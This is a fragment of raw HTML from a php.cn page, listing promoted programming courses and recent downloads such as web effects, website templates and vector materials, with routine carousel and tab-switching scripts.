ThinkPHP 5.1 world premiere video tutorial (60 days to become a PHP expert online training course)</a> <div class="wzrthreerb"> <div>1417428 <b class="kclbcollectb"></b></div> <div class="courseICollection" data-id="812"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="http://www.php.cn/course/74.html" title="PHP introductory tutorial one: Learn PHP in one week" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/068/6253d1e28ef5c345.png" alt="PHP introductory tutorial one: Learn PHP in one week"/> </a> <div class="wzrthree-right"> <a target="_blank" title="PHP introductory tutorial one: Learn PHP in one week" href="http://www.php.cn/course/74.html">PHP introductory tutorial one: Learn PHP in one week</a> <div class="wzrthreerb"> <div>4258581 <b class="kclbcollectb"></b></div> <div class="courseICollection" data-id="74"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="http://www.php.cn/course/286.html" title="JAVA Beginner's Video Tutorial" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/068/62590a2bacfd9379.png" alt="JAVA Beginner's Video Tutorial"/> </a> <div class="wzrthree-right"> <a target="_blank" title="JAVA Beginner's Video Tutorial" href="http://www.php.cn/course/286.html">JAVA Beginner's Video Tutorial</a> <div class="wzrthreerb"> <div>2481102 <b class="kclbcollectb"></b></div> <div class="courseICollection" data-id="286"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="http://www.php.cn/course/504.html" title="Little Turtle's zero-based introduction to learning Python video tutorial" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/068/62590a67ce3a6655.png" alt="Little Turtle's zero-based introduction to learning Python video tutorial"/> </a> <div class="wzrthree-right"> <a target="_blank" title="Little Turtle's zero-based introduction to learning Python video tutorial" href="http://www.php.cn/course/504.html">Little Turtle's zero-based introduction to learning Python video tutorial</a> <div class="wzrthreerb"> <div>504141 <b class="kclbcollectb"></b></div> <div class="courseICollection" data-id="504"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="http://www.php.cn/course/2.html" title="PHP zero-based introductory tutorial" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/068/6253de27bc161468.png" alt="PHP zero-based introductory tutorial"/> </a> <div class="wzrthree-right"> <a target="_blank" title="PHP zero-based introductory tutorial" href="http://www.php.cn/course/2.html">PHP zero-based introductory tutorial</a> <div class="wzrthreerb"> <div>844463 <b class="kclbcollectb"></b></div> <div class="courseICollection" data-id="2"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> </ul> <ul class="two" style="display: none;"> <li> <a target="_blank" href="http://www.php.cn/course/812.html" title="The latest ThinkPHP 5.1 world premiere video tutorial (60 days to become a PHP expert online training course)" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/041/620debc3eab3f377.jpg" alt="The latest ThinkPHP 5.1 world premiere video tutorial (60 days to become a PHP expert online training course)"/> </a> <div class="wzrthree-right"> <a target="_blank" title="The latest ThinkPHP 5.1 world premiere video tutorial (60 days to become a PHP expert online training course)" href="http://www.php.cn/course/812.html">The latest ThinkPHP 5.1 world premiere video tutorial (60 days to become a PHP expert online training course)</a> <div class="wzrthreerb"> <div >1417428 times of learning</div> <div class="courseICollection" data-id="812"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="http://www.php.cn/course/286.html" title="JAVA Beginner's Video Tutorial" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/068/62590a2bacfd9379.png" alt="JAVA Beginner's Video Tutorial"/> </a> <div class="wzrthree-right"> <a target="_blank" title="JAVA Beginner's Video Tutorial" href="http://www.php.cn/course/286.html">JAVA Beginner's Video Tutorial</a> <div class="wzrthreerb"> <div >2481102 times of learning</div> <div class="courseICollection" data-id="286"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="http://www.php.cn/course/504.html" title="Little Turtle's zero-based introduction to learning Python video tutorial" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/068/62590a67ce3a6655.png" alt="Little Turtle's zero-based introduction to learning Python video tutorial"/> </a> <div class="wzrthree-right"> <a target="_blank" title="Little Turtle's zero-based introduction to learning Python video tutorial" href="http://www.php.cn/course/504.html">Little Turtle's zero-based introduction to learning Python video tutorial</a> <div class="wzrthreerb"> <div >504141 times of learning</div> <div class="courseICollection" data-id="504"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="http://www.php.cn/course/901.html" title="Quick introduction to web front-end development" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/067/64be28a53a4f6310.png" alt="Quick introduction to web front-end development"/> </a> <div class="wzrthree-right"> <a target="_blank" title="Quick introduction to web front-end development" href="http://www.php.cn/course/901.html">Quick introduction to web front-end development</a> <div class="wzrthreerb"> <div >215339 times of learning</div> <div class="courseICollection" data-id="901"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="http://www.php.cn/course/234.html" title="Master PS video tutorials from scratch" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/068/62611f57ed0d4840.jpg" alt="Master PS video tutorials from scratch"/> </a> <div class="wzrthree-right"> <a target="_blank" title="Master PS video tutorials from scratch" href="http://www.php.cn/course/234.html">Master PS video tutorials from scratch</a> <div class="wzrthreerb"> <div >878341 times of learning</div> <div class="courseICollection" data-id="234"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> </ul> <ul class="three" style="display: none;"> <li> <a target="_blank" href="http://www.php.cn/course/1648.html" title="[Web front-end] Node.js quick start" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png" alt="[Web front-end] Node.js quick start"/> </a> <div class="wzrthree-right"> <a target="_blank" title="[Web front-end] Node.js quick start" href="http://www.php.cn/course/1648.html">[Web front-end] Node.js quick start</a> <div class="wzrthreerb"> <div >6488 times of learning</div> <div class="courseICollection" data-id="1648"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="http://www.php.cn/course/1647.html" title="Complete collection of foreign web development full-stack courses" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/067/6628cc96e310c937.png" alt="Complete collection of foreign web development full-stack courses"/> </a> <div class="wzrthree-right"> <a target="_blank" title="Complete collection of foreign web development full-stack courses" href="http://www.php.cn/course/1647.html">Complete collection of foreign web development full-stack courses</a> <div class="wzrthreerb"> <div >5096 times of learning</div> <div class="courseICollection" data-id="1647"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="http://www.php.cn/course/1646.html" title="Go language practical GraphQL" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/067/662221173504a436.png" alt="Go language practical GraphQL"/> </a> <div class="wzrthree-right"> <a target="_blank" title="Go language practical GraphQL" href="http://www.php.cn/course/1646.html">Go language practical GraphQL</a> <div class="wzrthreerb"> <div >4278 times of learning</div> <div class="courseICollection" data-id="1646"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="http://www.php.cn/course/1645.html" title="550W fan master learns JavaScript from scratch step by step" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/067/662077e163124646.png" alt="550W fan master learns JavaScript from scratch step by step"/> </a> <div class="wzrthree-right"> <a target="_blank" title="550W fan master learns JavaScript from scratch step by step" href="http://www.php.cn/course/1645.html">550W fan master learns JavaScript from scratch step by step</a> <div class="wzrthreerb"> <div >635 times of learning</div> <div class="courseICollection" data-id="1645"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> <li> <a target="_blank" href="http://www.php.cn/course/1644.html" title="Python master Mosh, a beginner with zero basic knowledge can get started in 6 hours" class="wzrthreelaimg"> <img src="https://img.php.cn/upload/course/000/000/067/6616418ca80b8916.png" alt="Python master Mosh, a beginner with zero basic knowledge can get started in 6 hours"/> </a> <div class="wzrthree-right"> <a target="_blank" title="Python master Mosh, a beginner with zero basic knowledge can get started in 6 hours" href="http://www.php.cn/course/1644.html">Python master Mosh, a beginner with zero basic knowledge can get started in 6 hours</a> <div class="wzrthreerb"> <div >21775 times of learning</div> <div class="courseICollection" data-id="1644"> <b class="nofollow small-nocollect"></b> </div> </div> </div> </li> </ul> </div> <script> var mySwiper = new Swiper('.swiper2', { autoplay: false,//可选选项,自动滑动 slidesPerView : 'auto', }) $('.wzrthreeTab>div').click(function(e){ $('.wzrthreeTab>div').removeClass('check') $(this).addClass('check') $('.wzrthreelist>ul').css('display','none') $('.'+e.currentTarget.dataset.id).show() }) </script> </div> <div class="wzrFour"> <div class="wzrfour-title"> <div>Latest Downloads</div> <a href="http://www.php.cn/xiazai">More> </a> </div> <script> $(document).ready(function(){ var sjyx_banSwiper = new Swiper(".sjyx_banSwiperwz",{ speed:1000, autoplay:{ delay:3500, disableOnInteraction: false, }, pagination:{ el:'.sjyx_banSwiperwz .swiper-pagination', clickable :false, }, loop:true }) }) </script> <div class="wzrfourList swiper3"> <div class="wzrfourlTab swiper-wrapper"> <div class="check swiper-slide" data-id="onef">Web Effects <div></div></div> <div class="swiper-slide" data-id="twof">Website Source Code<div></div></div> <div class="swiper-slide" data-id="threef">Website Materials<div></div></div> <div class="swiper-slide" data-id="fourf">Front End Template<div></div></div> </div> <ul class="onef"> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a target="_blank" title="jQuery enterprise message form contact code" href="http://www.php.cn/xiazai/js/8071">[form button] jQuery enterprise message form contact code</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a target="_blank" title="HTML5 MP3 music box playback effects" href="http://www.php.cn/xiazai/js/8070">[Player special effects] HTML5 MP3 music box playback effects</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a target="_blank" title="HTML5 cool particle animation navigation menu special effects" href="http://www.php.cn/xiazai/js/8069">[Menu navigation] HTML5 cool particle animation navigation menu special effects</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a target="_blank" title="jQuery visual form drag and drop editing code" href="http://www.php.cn/xiazai/js/8068">[form button] jQuery visual form drag and drop editing code</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a target="_blank" title="VUE.JS imitation Kugou music player code" href="http://www.php.cn/xiazai/js/8067">[Player special effects] VUE.JS imitation Kugou music player code</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a target="_blank" title="Classic html5 pushing box game" href="http://www.php.cn/xiazai/js/8066">[html5 special effects] Classic html5 pushing box game</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a target="_blank" title="jQuery scrolling to add or reduce image effects" href="http://www.php.cn/xiazai/js/8065">[Picture special effects] jQuery scrolling to add or reduce image effects</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a target="_blank" title="CSS3 personal album cover hover zoom effect" href="http://www.php.cn/xiazai/js/8064">[Photo album effects] CSS3 personal album cover hover zoom effect</a> </div> </li> </ul> <ul class="twof" style="display:none"> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/code/8328" title="Home Decor Cleaning and Repair Service Company Website Template" target="_blank">[Front-end template] Home Decor Cleaning and Repair Service Company Website Template</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/code/8327" title="Fresh color personal resume guide page template" target="_blank">[Front-end template] Fresh color personal resume guide page template</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/code/8326" title="Designer Creative Job Resume Web Template" target="_blank">[Front-end template] Designer Creative Job Resume Web Template</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/code/8325" title="Modern engineering construction company website template" target="_blank">[Front-end template] Modern engineering construction company website template</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/code/8324" title="Responsive HTML5 template for educational service institutions" target="_blank">[Front-end template] Responsive HTML5 template for educational service institutions</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/code/8323" title="Online e-book store mall website template" target="_blank">[Front-end template] Online e-book store mall website template</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/code/8322" title="IT technology solves Internet company website template" target="_blank">[Front-end template] IT technology solves Internet company website template</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/code/8321" title="Purple style foreign exchange trading service website template" target="_blank">[Front-end template] Purple style foreign exchange trading service website template</a> </div> </li> </ul> <ul class="threef" style="display:none"> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/sucai/3078" target="_blank" title="Cute summer elements vector material (EPS PNG)">[PNG material] Cute summer elements vector material (EPS PNG)</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/sucai/3077" target="_blank" title="Four red 2023 graduation badges vector material (AI EPS PNG)">[PNG material] Four red 2023 graduation badges vector material (AI EPS PNG)</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/sucai/3076" target="_blank" title="Singing bird and cart filled with flowers design spring banner vector material (AI EPS)">[banner picture] Singing bird and cart filled with flowers design spring banner vector material (AI EPS)</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/sucai/3075" target="_blank" title="Golden graduation cap vector material (EPS PNG)">[PNG material] Golden graduation cap vector material (EPS PNG)</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/sucai/3074" target="_blank" title="Black and white style mountain icon vector material (EPS PNG)">[PNG material] Black and white style mountain icon vector material (EPS PNG)</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/sucai/3073" target="_blank" title="Superhero silhouette vector material (EPS PNG) with different color cloaks and different poses">[PNG material] Superhero silhouette vector material (EPS PNG) with different color cloaks and different poses</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/sucai/3072" target="_blank" title="Flat style Arbor Day banner vector material (AI+EPS)">[banner picture] Flat style Arbor Day banner vector material (AI+EPS)</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/sucai/3071" target="_blank" title="Nine comic-style exploding chat bubbles vector material (EPS+PNG)">[PNG material] Nine comic-style exploding chat bubbles vector material (EPS+PNG)</a> </div> </li> </ul> <ul class="fourf" style="display:none"> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/code/8328" target="_blank" title="Home Decor Cleaning and Repair Service Company Website Template">[Front-end template] Home Decor Cleaning and Repair Service Company Website Template</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/code/8327" target="_blank" title="Fresh color personal resume guide page template">[Front-end template] Fresh color personal resume guide page template</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/code/8326" target="_blank" title="Designer Creative Job Resume Web Template">[Front-end template] Designer Creative Job Resume Web Template</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/code/8325" target="_blank" title="Modern engineering construction company website template">[Front-end template] Modern engineering construction company website template</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/code/8324" target="_blank" title="Responsive HTML5 template for educational service institutions">[Front-end template] Responsive HTML5 template for educational service institutions</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/code/8323" target="_blank" title="Online e-book store mall website template">[Front-end template] Online e-book store mall website template</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/code/8322" target="_blank" title="IT technology solves Internet company website template">[Front-end template] IT technology solves Internet company website template</a> </div> </li> <li> <div class="wzrfourli"> <span class="layui-badge-dots wzrflr"></span> <a href="http://www.php.cn/xiazai/code/8321" target="_blank" title="Purple style foreign exchange trading service website template">[Front-end template] Purple style foreign exchange trading service website template</a> </div> </li> </ul> </div> <script> var mySwiper = new Swiper('.swiper3', { autoplay: false,//可选选项,自动滑动 slidesPerView : 'auto', }) $('.wzrfourlTab>div').click(function(e){ $('.wzrfourlTab>div').removeClass('check') $(this).addClass('check') $('.wzrfourList>ul').css('display','none') $('.'+e.currentTarget.dataset.id).show() }) </script> </div> </div> </div> <div class="phpFoot"> <div class="phpFootIn"> <div class="phpFootCont"> <div class="phpFootLeft"> <dl> <dt> <a href="http://www.php.cn/about/xieyi.html" rel="nofollow" target="_blank" title="About us" class="cBlack">About us</a> <a href="http://www.php.cn/about/yinsi.html" rel="nofollow" target="_blank" title="Disclaimer" class="cBlack">Disclaimer</a> <a href="http://www.php.cn/update/article_0_1.html" target="_blank" title="Sitemap" class="cBlack">Sitemap</a> <div class="clear"></div> </dt> <dd class="cont1">php.cn:Public welfare online PHP training,Help PHP learners grow quickly!</dd> </dl> </div> </div> </div> </div> <input type="hidden" id="verifycode" value="/captcha.html"> <script>layui.use(['element', 'carousel'], function () {var element = layui.element;$ = layui.jquery;var carousel = layui.carousel;carousel.render({elem: '#test1', width: '100%', height: '330px', arrow: 'always'});$.getScript('/static/js/jquery.lazyload.min.js', function () {$("img").lazyload({placeholder: "/static/images/load.jpg", effect: "fadeIn", threshold: 200, skip_invisible: false});});});</script> <script src="/static/js/common_new.js"></script> <script type="text/javascript" src="/static/js/jquery.cookie.js?1731417818"></script> <script src="https://vdse.bdstatic.com//search-video.v1.min.js"></script> <link rel='stylesheet' id='_main-css' href='/static/css/viewer.min.css?2' type='text/css' media='all'/> <script type='text/javascript' src='/static/js/viewer.min.js?1'></script> <script type='text/javascript' src='/static/js/jquery-viewer.min.js'></script> <script type="text/javascript" src="/static/js/global.min.js?5.5.53"></script> </body> </html>